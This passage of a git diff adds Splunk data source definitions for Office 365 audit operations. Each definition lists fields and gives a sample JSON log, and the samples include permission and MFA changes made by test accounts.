+  "Path": "\\Inbox"}], "OperationCount": 4}'
diff --git a/data_sources/o365_modifyfolderpermissions.yml b/data_sources/o365_modifyfolderpermissions.yml
new file mode 100644
index 0000000000..60d13430ce
--- /dev/null
+++ b/data_sources/o365_modifyfolderpermissions.yml
@@ -0,0 +1,108 @@
+name: O365 ModifyFolderPermissions
+id: 0a8c1080-68c2-46d7-8324-2e7d97bb6e2f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 ModifyFolderPermissions
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- AppId
+- ClientIP
+- ClientIPAddress
+- ClientInfoString
+- CreationTime
+- ExternalAccess
+- Id
+- InternalLogonType
+- Item.Id
+- Item.ParentFolder.Id
+- Item.ParentFolder.MemberRights
+- Item.ParentFolder.MemberSid
+- Item.ParentFolder.MemberUpn
+- Item.ParentFolder.Name
+- Item.ParentFolder.Path
+- LogonType
+- LogonUserSid
+- MailboxGuid
+- MailboxOwnerSid
+- MailboxOwnerUPN
+- Operation
+- OrganizationId
+- OrganizationName
+- OriginatingServer
+- RecordType
+- ResultStatus
+- SessionId
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- app
+- authentication_service
+- change_type
+- client_info_str
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- eventtype
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- object_id
+- punct
+- record_type
+- result
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- tag
+- tag::eventtype
+- tenant_id
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-07T18:19:07", "Id": "ff065c17-e638-4013-20ab-08dbafceeca1",
+  "Operation": "ModifyFolderPermissions", "OrganizationId": "e17879dd-24ec-44a6-be92-9dcbf6969220",
+  "RecordType": 2, "ResultStatus": "Succeeded", "UserKey": "10032002CC029AE9", "UserType":
+  0, "Version": 1, "Workload": "Exchange", "ClientIP": "22.23.21.25", "UserId": "user1@contoso.onmicrosoft.com",
+  "AppId": "00000002-0000-0ff1-ce00-000000000000", "ClientIPAddress": "22.23.21.25",
+  "ClientInfoString": "Client=OWA;Action=ViaProxy", "ExternalAccess": false, "InternalLogonType":
+  0, "LogonType": 0, "LogonUserSid": "S-1-5-21-1148582062-3132321681-773847816-45339891",
+  "MailboxGuid": "8e942cc1-73d8-4483-9def-7d9579d615a7", "MailboxOwnerSid": "S-1-5-21-1148582062-3132321681-773847816-45339891",
+  "MailboxOwnerUPN": "user1@contoso.onmicrosoft.com", "OrganizationName": "contoso.onmicrosoft.com",
+  "OriginatingServer": "BYAPR18MB2728 (15.20.4200.000)\r\n", "SessionId": "d2a5a3ba-992b-431a-9b52-8c76210d17d9",
+  "Item": {"Id": "LgAAAABKe+NY5HVjRYWDqaJ5IKKFAQBQ11dzmT6LS6bQbkNDtISsAAAAAAEMAAAB",
+  "ParentFolder": {"Id": "LgAAAABKe+NY5HVjRYWDqaJ5IKKFAQBQ11dzmT6LS6bQbkNDtISsAAAAAAEMAAAB",
+  "MemberRights": "FreeBusySimple", "MemberSid": "S-1-1-0", "MemberUpn": "Everyone",
+  "Name": "Inbox", "Path": "\\Inbox"}}}'
diff --git a/data_sources/o365_set_company_information_.yml b/data_sources/o365_set_company_information_.yml
new file mode 100644
index 0000000000..534cc52f87
--- /dev/null
+++ b/data_sources/o365_set_company_information_.yml
@@ -0,0 +1,115 @@
+name: O365 Set Company Information.
+id: 06c6d576-f032-41e3-b15d-80a434ce13d8
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Set Company Information.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- ClientIP
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- extended_properties
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"Actor": [{"ID": "bpatel@rodsoto.onmicrosoft.com", "Type": 5}, {"ID":
+  "100320010208B5DC", "Type": 3}, {"ID": "User_425b75db-38be-4c7b-a474-5f0709247370",
+  "Type": 2}, {"ID": "425b75db-38be-4c7b-a474-5f0709247370", "Type": 2}, {"ID": "User",
+  "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress":
+  "", "AzureActiveDirectoryEventType": 1, "ClientIP": "", "CreationTime": "2021-01-13T22:57:21",
+  "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory",
+  "Value": "Company"}], "Id": "50a62783-f9d7-472c-9e44-f4f3d346e53c", "InterSystemsId":
+  "6f435e84-e95b-44da-820f-2d2c9c237293", "IntraSystemId": "1163f0db-2241-4689-8486-b15c7812bbe0",
+  "ModifiedProperties": [{"Name": "StrongAuthenticationPolicy", "NewValue": "[\r\n  {\r\n    \"RelyingPartyStrongAuthenticationPolicies\":
+  [\r\n      {\r\n        \"RelyingParties\": [\r\n          \"*\"\r\n        ],\r\n        \"Rules\":
+  [\r\n          {\r\n            \"SelectionConditions\": [\r\n              {\r\n                \"Claim\":
+  1,\r\n                \"Operator\": 0,\r\n                \"Values\": [\r\n                  \"73.15.72.101/32\",\r\n                  \"66.176.252.11/32\"\r\n                ]\r\n              }\r\n            ]\r\n          }\r\n        ],\r\n        \"Enabled\":
+  true\r\n      }\r\n    ]\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"RelyingPartyStrongAuthenticationPolicies\":
+  [\r\n      {\r\n        \"RelyingParties\": [\r\n          \"*\"\r\n        ],\r\n        \"Rules\":
+  [\r\n          {\r\n            \"SelectionConditions\": [\r\n              {\r\n                \"Claim\":
+  1,\r\n                \"Operator\": 0,\r\n                \"Values\": [\r\n                  \"73.15.72.101/32\",\r\n                  \"66.176.252.11/32\"\r\n                ]\r\n              }\r\n            ]\r\n          },\r\n          {\r\n            \"SelectionConditions\":
+  [\r\n              {\r\n                \"Claim\": 2,\r\n                \"Operator\":
+  0,\r\n                \"Values\": [\r\n                  \"insidecorporatenetwork--true\"\r\n                ]\r\n              }\r\n            ]\r\n          }\r\n        ],\r\n        \"Enabled\":
+  true\r\n      }\r\n    ]\r\n  }\r\n]"}, {"Name": "Included Updated Properties",
+  "NewValue": "StrongAuthenticationPolicy", "OldValue": ""}], "ObjectId": "Company_0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "Operation": "Set Company Information.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID":
+  "Company_0e8108b1-18e9-41a4-961b-dfcddf92ef08", "Type": 2}, {"ID": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "Type": 2}, {"ID": "Directory", "Type": 2}, {"ID": "Emergency Information Technology
+  Services LLC", "Type": 1}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "UserId": "bpatel@rodsoto.onmicrosoft.com", "UserKey": "100320010208B5DC@rodsoto.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
diff --git a/data_sources/o365_set_mailbox.yml b/data_sources/o365_set_mailbox.yml
new file mode 100644
index 0000000000..7ae4d85964
--- /dev/null
+++ b/data_sources/o365_set_mailbox.yml
@@ -0,0 +1,92 @@
+name: O365 Set-Mailbox
+id: db798c5c-928c-4972-bb42-e5f90e35865f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Set-Mailbox
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- AppId
+- ClientAppId
+- ClientIP
+- CreationTime
+- ExternalAccess
+- Id
+- Identity
+- ObjectId
+- Operation
+- OrganizationId
+- OrganizationName
+- OriginatingServer
+- Parameters{}.Name
+- Parameters{}.Value
+- Params
+- RecordType
+- ResultStatus
+- SessionId
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- eventtype
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- object_id
+- punct
+- record_type
+- result
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user
+- src_user_type
+- status
+- tag
+- tag::eventtype
+- tenant_id
+- timeendpos
+- timestartpos
+- user
+- user_id
+- vendor_account
+- vendor_product
+example_log: '{"AppId": "", "ClientAppId": "", "ClientIP": "18.192.200.190:52816",
+  "CreationTime": "2020-12-16T12:32:28", "ExternalAccess": false, "Id": "a6a52406-0912-448d-36eb-08d8a1bea6be",
+  "ObjectId": "bpatel", "Operation": "Set-Mailbox", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "OrganizationName": "rodsoto.onmicrosoft.com", "OriginatingServer": "PH0PR14MB4341
+  (15.20.3654.025)", "Parameters": [{"Name": "ForwardingAddress", "Value": ""}, {"Name":
+  "Identity", "Value": "bpatel@rodsoto.onmicrosoft.com"}], "RecordType": 1, "ResultStatus":
+  "True", "SessionId": "86a7cd7c-3f42-4b68-b670-4024b5461a80", "UserId": "pbareiss@rodsoto.onmicrosoft.com",
+  "UserKey": "10032001020A3408", "UserType": 2, "Version": 1, "Workload": "Exchange"}'
diff --git a/data_sources/o365_update_application_.yml b/data_sources/o365_update_application_.yml
new file mode 100644
index 0000000000..bd21101d66
--- /dev/null
+++ b/data_sources/o365_update_application_.yml
@@ -0,0 +1,116 @@
+name: O365 Update application.
+id: 62159133-911b-4c63-9e30-a6a8c89195ca
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Update application.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-01T17:16:20", "Id": "c428c85c-4fa0-4e97-9033-6a76d9dee45d",
+  "Operation": "Update application.", "OrganizationId": "58aee3b9-7433-46a0-b54e-2429487992a0",
+  "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "Application_a2d68f8b-ab9f-47ac-934f-b966c3ac134f",
+  "UserId": "attacker@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1,
+  "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0
+  (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0
+  Safari/537.36\",\"AppId\":\"95106c0e-3519-450e-8e38-7f326d873454\"}"}, {"Name":
+  "extendedAuditEventCategory", "Value": "Application"}], "ModifiedProperties": [{"Name":
+  "RequiredResourceAccess", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\":
+  [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\":
+  false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      },\r\n      {\r\n        \"EntitlementId\":
+  \"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\":
+  []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"b633e1c5-b582-4048-a93e-9f11b44c7e96\",\r\n        \"DirectAccessGrant\":
+  true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\":
+  1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\":
+  [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\":
+  false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\":
+  1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "RequiredResourceAccess",
+  "OldValue": ""}], "Actor": [{"ID": "attacker@contoso.onmicrosoft.com", "Type": 5},
+  {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
+  "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID":
+  "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}],
+  "ActorContextId": "58aee3b9-7433-46a0-b54e-2429487992a0", "InterSystemsId": "6a0bc9d4-eb2d-4eb0-a524-601dac6914a6",
+  "IntraSystemId": "a2d4d7c4-727c-401b-9e6c-70413a080855", "SupportTicketId": "",
+  "Target": [{"ID": "Application_a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "Type": 2},
+  {"ID": "a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "Type": 2}, {"ID": "Application",
+  "Type": 2}, {"ID": "TestApp2", "Type": 1}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454",
+  "Type": 2}], "TargetContextId": "58aee3b9-7433-46a0-b54e-2429487992a0"}'
diff --git a/data_sources/o365_update_authorization_policy_.yml b/data_sources/o365_update_authorization_policy_.yml
new file mode 100644
index 0000000000..2257421d06
--- /dev/null
+++ b/data_sources/o365_update_authorization_policy_.yml
@@ -0,0 +1,99 @@
+name: O365 Update authorization policy.
+id: d40e6a20-4d64-404c-8351-2caae8228d34
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Update authorization policy.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-10-26T19:22:20", "Id": "83774e72-313f-4d1f-8609-7d0c7bb3b4ff",
+  "Operation": "Update authorization policy.", "OrganizationId": "a417c578-c7ee-480d-a225-d48057e74df5",
+  "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "AuthorizationPolicy_24484114-1daa-4700-aaf7-44ee5cbe5678",
+  "UserId": "user30@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType":
+  1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Swagger-Codegen/1.0.0.0/csharp/msal\"}"},
+  {"Name": "extendedAuditEventCategory", "Value": "AuthorizationPolicy"}], "ModifiedProperties":
+  [{"Name": "AllowUserConsentForRiskyApps", "NewValue": "[\r\n  true\r\n]", "OldValue":
+  "[\r\n  false\r\n]"}, {"Name": "PermissionGrantPolicyIdsAssignedToDefaultUserRole",
+  "NewValue": "[\r\n  \"microsoft-user-default-legacy\"\r\n]", "OldValue": "[\r\n  \"ManagePermissionGrantsForSelf.microsoft-user-default-legacy\"\r\n]"},
+  {"Name": "Included Updated Properties", "NewValue": "AllowUserConsentForRiskyApps,
+  PermissionGrantPolicyIdsAssignedToDefaultUserRole", "OldValue": ""}], "Actor": [{"ID":
+  "user30@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E",
+  "Type": 3}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID":
+  "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}],
+  "ActorContextId": "a417c578-c7ee-480d-a225-d48057e74df5", "InterSystemsId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065",
+  "IntraSystemId": "92a0d051-2d0d-4608-9d09-6fca619764a2", "SupportTicketId": "",
+  "Target": [{"ID": "AuthorizationPolicy_24484114-1daa-4700-aaf7-44ee5cbe5678", "Type":
+  2}, {"ID": "24484114-1daa-4700-aaf7-44ee5cbe5678", "Type": 2}, {"ID": "Other", "Type":
+  2}, {"ID": "Authorization Policy", "Type": 1}], "TargetContextId": "a417c578-c7ee-480d-a225-d48057e74df5"}'
diff --git a/data_sources/o365_update_user_.yml b/data_sources/o365_update_user_.yml
new file mode 100644
index 0000000000..f651738fb1
--- /dev/null
+++ b/data_sources/o365_update_user_.yml
@@ -0,0 +1,113 @@
+name: O365 Update user.
+id: a05fd01e-34d9-4233-9089-11272416b531
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Update user.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src_user
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-10-20T19:32:59", "Id": "d06df1c6-b3f2-4595-90b9-99b8f91811c3",
+  "Operation": "Update user.", "OrganizationId": "99825d50-9544-4061-8e46-68923805cbf2",
+  "RecordType": 8, "ResultStatus": "Success", "UserKey": "10032002CC029AE9@splunkresearch1.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "victim@splunkresearch1.onmicrosoft.com",
+  "UserId": "victim@splunkresearch1.onmicrosoft.com", "AzureActiveDirectoryEventType":
+  1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"UserType\":\"Member\"}"},
+  {"Name": "extendedAuditEventCategory", "Value": "User"}], "ModifiedProperties":
+  [{"Name": "StrongAuthenticationMethod", "NewValue": "[\r\n  {\r\n    \"MethodType\":
+  7,\r\n    \"Default\": false\r\n  },\r\n  {\r\n    \"MethodType\": 6,\r\n    \"Default\":
+  true\r\n  },\r\n  {\r\n    \"MethodType\": 0,\r\n    \"Default\": false\r\n  },\r\n  {\r\n    \"MethodType\":
+  5,\r\n    \"Default\": false\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"MethodType\":
+  6,\r\n    \"Default\": true\r\n  },\r\n  {\r\n    \"MethodType\": 7,\r\n    \"Default\":
+  false\r\n  }\r\n]"}, {"Name": "StrongAuthenticationRequirement", "NewValue": "[\r\n  {\r\n    \"RelyingParty\":
+  \"*\",\r\n    \"State\": 0,\r\n    \"RememberDevicesNotIssuedBefore\": \"2023-10-19T16:11:43+00:00\"\r\n  }\r\n]",
+  "OldValue": "[\r\n  {\r\n    \"RelyingParty\": \"*\",\r\n    \"State\": 1,\r\n    \"RememberDevicesNotIssuedBefore\":
+  \"2023-10-19T16:11:43+00:00\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties",
+  "NewValue": "StrongAuthenticationMethod, StrongAuthenticationRequirement", "OldValue":
+  ""}, {"Name": "TargetId.UserType", "NewValue": "Member", "OldValue": ""}], "Actor":
+  [{"ID": "victim@splunkresearch1.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9",
+  "Type": 3}, {"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID":
+  "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}],
+  "ActorContextId": "99825d50-9544-4061-8e46-68923805cbf2", "InterSystemsId": "533a45c6-4f9a-4527-ad8d-e8fec5c7d8e4",
+  "IntraSystemId": "32734207-053e-4ad1-87a3-4da1dfa69c58", "SupportTicketId": "",
+  "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID":
+  "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID":
+  "victim@splunkresearch1.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9",
+  "Type": 3}], "TargetContextId": "99825d50-9544-4061-8e46-68923805cbf2"}'
diff --git a/data_sources/o365_userloggedin.yml b/data_sources/o365_userloggedin.yml
new file mode 100644
index 0000000000..2e246cf766
--- /dev/null
+++ b/data_sources/o365_userloggedin.yml
@@ -0,0 +1,103 @@
+name: O365 UserLoggedIn
+id: ed29c8c4-4053-419c-b133-16abf2a1c4c9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 UserLoggedIn
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- ApplicationId
+- AzureActiveDirectoryEventType
+- BrowserType
+- ClientIP
+- CreationTime
+- DeviceProperties{}.Name
+- DeviceProperties{}.Value
+- ErrorNumber
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- OS
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- RequestType
+- ResultStatus
+- ResultStatusDetail
+- SessionId
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserAgent
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-12-04T20:42:05", "Id": "52d72a62-132b-487b-bb7f-c4c119f90700",
+  "Operation": "UserLoggedIn", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4",
+  "RecordType": 15, "ResultStatus": "Success", "UserKey": "2d2f9e2c-8350-4d98-852e-3f06daaf7185",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ClientIP": "54.68.231.63",
+  "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "UserId": "user15@splunkresearch.onmicrosoft.com",
+  "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "ResultStatusDetail",
+  "Value": "Success"}, {"Name": "UserAgent", "Value": "Mozilla/5.0 (Windows NT 10.0;
+  Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}, {"Name": "RequestType", "Value":
+  "OAuth2:Authorize"}], "ModifiedProperties": [], "Actor": [{"ID": "2d2f9e2c-8350-4d98-852e-3f06daaf7185",
+  "Type": 0}, {"ID": "user15@splunkresearch.onmicrosoft.com", "Type": 5}], "ActorContextId":
+  "75243ab2-44f8-435c-a7a6-b479385df6d4", "ActorIpAddress": "54.68.231.63", "InterSystemsId":
+  "6463a6ad-27ec-b311-dc52-ecdde38d9492", "IntraSystemId": "52d72a62-132b-487b-bb7f-c4c119f90700",
+  "SupportTicketId": "", "Target": [{"ID": "00000002-0000-0ff1-ce00-000000000000",
+  "Type": 0}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "ApplicationId":
+  "00000002-0000-0ff1-ce00-000000000000", "DeviceProperties": [{"Name": "OS", "Value":
+  "Windows10"}, {"Name": "BrowserType", "Value": "Firefox"}, {"Name": "SessionId",
+  "Value": "15e27956-79a0-45b2-9d02-60f48349f692"}], "ErrorNumber": "0"}'
diff --git a/data_sources/o365_userloginfailed.yml b/data_sources/o365_userloginfailed.yml
new file mode 100644
index 0000000000..c9cab2bd17
--- /dev/null
+++ b/data_sources/o365_userloginfailed.yml
@@ -0,0 +1,113 @@
+name: O365 UserLoginFailed
+id: 6099b33d-d581-43ed-8401-911862590361
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 UserLoginFailed
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- ApplicationId
+- AzureActiveDirectoryEventType
+- BrowserType
+- ClientIP
+- CreationTime
+- DeviceProperties{}.Name
+- DeviceProperties{}.Value
+- ErrorNumber
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- IsCompliantAndManaged
+- LogonError
+- OS
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- RequestType
+- ResultStatus
+- ResultStatusDetail
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserAgent
